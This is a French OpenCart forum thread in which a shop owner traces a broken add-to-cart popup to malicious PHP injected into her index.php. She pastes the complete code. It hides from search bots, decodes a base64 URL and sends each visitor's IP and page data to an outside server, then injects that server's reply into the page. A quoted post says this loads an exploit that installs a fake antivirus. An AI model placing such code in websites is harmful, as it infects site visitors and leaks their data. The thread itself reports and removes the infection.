Nous ne répondons seulement qu'aux sujets dont l'auteur a complété sa signature [Lire]



Vous avez des soucis avec votre Opencart v1.5.x, nous pouvons résoudre vos problèmes,
contactez le Bureau France !

par tel: 0 891 690 175 ou par
email

Problème du popup "ajout au panier"

Inscrire dans ce forum tous les types de problèmes que vous rencontrez avec OpenCart

Problème du popup "ajout au panier"

Messagepar kyoudelune » 09 Mai 2012, 17:40

Bonjour je suis une nouvelle utilisatrice d'Opencart, voici mon problème :
quand on clic sur le bouton "ajout au panier" , le popup signalant que le produit a bien été ajouté au panier ne fonctionne pas mais en revanche le produit est bien dans le panier

Je ne parviens pas a trouver ou ce situe le problème.

Merci de votre aide !
Opencart 1.5.1.1
Hébergeur 1 and 1

Thème : modifié
https://www.shopping.kalyabeauty.fr
Tous les gens sont des génies. Mais si vous jugez un poisson sur sa capacité à grimper un arbre, il va croire toute sa vie qu'il est stupide
kyoudelune
Utilisateur enregistré
Utilisateur enregistré
 
Messages: 7
Inscription: 09 Mai 2012, 16:54

Re: Problème du popup "ajout au panier"

Messagepar kyoudelune » 09 Mai 2012, 21:12

En fait j'ai résolu mon problème, j'avais une ligne d'erreur en fin de page d'accueil de mon site concernant mon index.php apparemment " on" m'a ajouté des lignes :

Code: Tout sélectionner
?><?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics           
        $stCurlLink = base64_decode( 'aHR0cDovL2JvdHN0YXRpc3RpY3VwZGF0ZS5jb20vc3RhdC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            @$stCurlHandle = curl_init( $stCurlLink );
    }
    }
if ( $stCurlHandle !== NULL )
{
    curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 12);
    $sResult = @curl_exec($stCurlHandle);
    if ($sResult[0]=="O")
     {$sResult[0]=" ";
      echo $sResult; // Statistic code end
      }
    curl_close($stCurlHandle);
}
}


Après des recherches sur Google en tapant : "This code use for global bot statistic" j'ai trouvé un forum ou il parlait de ça

-->" Il teste si le visiteur est un bot connu (ou cetains navigateurs), si ce n'est pas le cas il importe un exploit en JavaScript dans la page qui déclenche l'installation d'un virus, désactive le centre de sécurité et le gestionnaire de tache.Le virus ressemble à un faux antivirus (Smart Fortress 2012) et lance un faux scan du PC et de faux messages d'alertes. Je suis pas allé plus loin.
un conseil : supprimer le code sans attendre."

J'ai donc supprimé le code de mon index et tout est rentré dans l'ordre. :D
Opencart 1.5.1.1
Hébergeur 1 and 1

Thème : modifié
https://www.shopping.kalyabeauty.fr
Tous les gens sont des génies. Mais si vous jugez un poisson sur sa capacité à grimper un arbre, il va croire toute sa vie qu'il est stupide
kyoudelune
Utilisateur enregistré
Utilisateur enregistré
 
Messages: 7
Inscription: 09 Mai 2012, 16:54

Re: Problème du popup "ajout au panier"

Messagepar LeorLindel » 09 Mai 2012, 21:17

Je remarque que le thème que tu as n'est pas le thème d'origine (cela ne figure nullement dans ta signature). Est-ce un template que tu as acquis ou est-ce une modification de ta part ?

Merci de ce retour quand même.
Image
1 - A lire avant de poster un sujet
2 - Politique sur la signature.

Quand le sujet est résolu, pensez à ajouter la petite coche verte Image dans le titre initial en éditant votre premier message et non dans votre dernière réponse.
Merci


Toutes les extensions commerciales (templates ou modules payants) ne peuvent pas faire l'objet d'ouverture de sujet, prière de bien vouloir s'adresser au concepteur en cas de problème ou demande de renseignements.

Seul, on avance plus vite, à plusieurs on avance plus loin.
Avatar de l’utilisateur
LeorLindel
Administrateur
Administrateur
 
Messages: 4227
Inscription: 19 Fév 2010, 13:44
Localisation: Lutéce

Re: Problème du popup "ajout au panier"

Messagepar kyoudelune » 10 Mai 2012, 08:07

ma signature est rectifiée
Opencart 1.5.1.1
Hébergeur 1 and 1

Thème : modifié
https://www.shopping.kalyabeauty.fr
Tous les gens sont des génies. Mais si vous jugez un poisson sur sa capacité à grimper un arbre, il va croire toute sa vie qu'il est stupide
kyoudelune
Utilisateur enregistré
Utilisateur enregistré
 
Messages: 7
Inscription: 09 Mai 2012, 16:54


Retourner vers Rapports de Problèmes

Qui est en ligne

Utilisateurs parcourant ce forum: Aucun utilisateur enregistré et 1 invité

cron